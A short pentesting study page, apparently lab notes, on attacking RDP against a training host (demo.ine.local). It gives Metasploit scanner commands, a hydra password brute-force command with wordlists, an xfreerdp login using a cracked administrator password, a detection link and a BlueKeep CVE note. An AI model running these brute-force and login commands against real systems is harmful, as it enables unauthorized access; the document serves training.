Port 3389 - RDP

Identifying non deafult port as RDP with aux scanner

msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS demo.ine.local
set RPORT 3333
exploit

We can Identify RDP endpoints using an auxiliary module on port 3333 if it’s running RDP.

Bruteforcing RDP (hydra)

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://demo.ine.local -s 3333

XFREERDP

xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333

Detecting RDP Attacks

Lateral Movement - Remote Desktop Protocol (RDP) Event LogsThe DFIR Spot

CVE-2019-0708 Bluekeep

Fails if NW authentication is enabled

The BlueKeep vulnerability affects multiple versions of Windows:

XP
Vista
Windows 7
Windows Server 2008 & R2

PreviousPort 3306 MySQL NextPort 5985 - WINRM

Last updated 1 month ago

hashtagIdentifying non deafult port as RDP with aux scanner

hashtagBruteforcing RDP (hydra)

hashtagXFREERDP

hashtagDetecting RDP Attacks

hashtagCVE-2019-0708 Bluekeep

Identifying non deafult port as RDP with aux scanner

Bruteforcing RDP (hydra)

XFREERDP

Detecting RDP Attacks

CVE-2019-0708 Bluekeep